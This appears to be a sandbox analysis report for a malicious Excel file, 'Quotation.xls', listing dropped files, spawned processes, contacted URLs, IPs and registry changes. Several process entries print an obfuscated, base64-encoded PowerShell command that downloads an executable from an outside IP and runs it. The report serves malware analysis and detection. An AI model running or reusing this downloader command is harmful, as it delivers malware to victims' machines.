Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Quotation.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jul 25 17:59:41 2024, Security: 1
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\gdfvr[1].hta
|
HTML document, ASCII text, with very long lines (65498), with CRLF line terminators
|
modified
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\winiti.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\Desktop\Quotation.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 08:30:16 2024, Security: 1
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\379F14B3.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ACE5F18.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85C1546B.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\2shkkccg.cfp.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\5cxhwuvg.2ql.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESC41B.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Jul 26 07:30:05 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\RESC9F.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Fri Jul 26 07:30:24 2024,
1st section name ".debug$S"
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\d4cyswwi.q0u.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP
|
MSVC .res
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\pyktbusk.55o.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF1B9FEB1D292F091B.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF5769E9ACD5F566F4.TMP
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DF91B6A489623540E3.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\~DFEEA8520C06A11796.TMP
|
data
|
dropped
|
||
|
C:\Users\user\Desktop\37330000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 08:30:16 2024, Security: 1
|
dropped
|
||
|
C:\Users\user\Desktop\37330000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 23 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss
-nop -w 1 -c
DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POWERsHElL.exe -ex BypAss -nop
-w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT
; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
|
|
|
|
C:\Users\user\AppData\Roaming\winiti.exe
|
"C:\Users\user\AppData\Roaming\winiti.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
|
|
|
|
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss
-nop -w 1 -c
DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
POWERsHElL.exe -ex BypAss -nop
-w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT
; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
|
|
|
|
C:\Users\user\AppData\Roaming\winiti.exe
|
"C:\Users\user\AppData\Roaming\winiti.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
|
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp"
"c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp"
"c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://tny.wtf/jjJsPXdO
|
unknown
|
|
|
|
unifrieghtmovers.com
|
|
||
|
http://tny.wtf/jjJsPX0
|
unknown
|
|
|
|
http://tny.wtf/
|
unknown
|
|
|
|
http://tny.wtf/jjJsPX
|
188.114.96.3
|
|
|
|
http://tny.wtf/jjJsPXM
|
unknown
|
|
|
|
http://tny.wtf/jjJsPXa
|
unknown
|
|
|
|
http://tny.wtf/jjJsPXe
|
unknown
|
|
|
|
http://107.173.143.46/T2507F/csrss.exep
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htax
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaC:
|
unknown
|
||
|
http://91.92.245.100/up
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://107.173.143.46/T2507F/csr
|
unknown
|
||
|
https://aka.ms/nativeaot-c
|
unknown
|
||
|
http://107.173.143.46/T2507F/csrss.exewerSh
|
unknown
|
||
|
http://107.173.143.46/T2507F/csrss.exed.
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
http://107.173.143.46/T2507F/csrss.exe
|
107.173.143.46
|
||
|
http://geoplugin.net/json.gp/C
|
unknown
|
||
|
https://aka.ms/nativeaot-compatibility
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta0
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://crl.usertru8
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...r
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://aka.ms/nativeaot-compatibilityy
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta...b
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htahttp://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaoso
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.hta
|
91.92.245.100
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaic
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htaP
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://91.92.245.100/
|
unknown
|
||
|
http://107.173.143.46/T2507F/csrss.exem1
|
unknown
|
||
|
https://aka.ms/nativeaot-compatibilityY
|
unknown
|
||
|
https://aka.ms/nativeaot-compatibilityX
|
unknown
|
||
|
https://aka.ms/GlobalizationInvariantMode
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htat
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
http://91.92.245.100/xampp/ebcd/eb/gdfvr.htao
|
unknown
|
There are 42 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
unifrieghtmovers.com
|
23.95.60.82
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
tny.wtf
|
188.114.96.3
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
23.95.60.82
|
unifrieghtmovers.com
|
United States
|
|
|
|
91.92.245.100
|
unknown
|
Bulgaria
|
||
|
107.173.143.46
|
unknown
|
United States
|
||
|
188.114.96.3
|
tny.wtf
|
European Union
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
)%,
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\299C0
|
299C0
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
;,,
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3400C
|
3400C
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34598
|
34598
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\35013
|
35013
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
|
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Max Display
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 1
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 2
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 3
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 4
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 5
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 6
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 7
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 8
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 9
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 10
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 11
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 12
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 13
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 14
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 15
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 16
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 17
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 18
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 19
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 20
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
|
Item 21
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
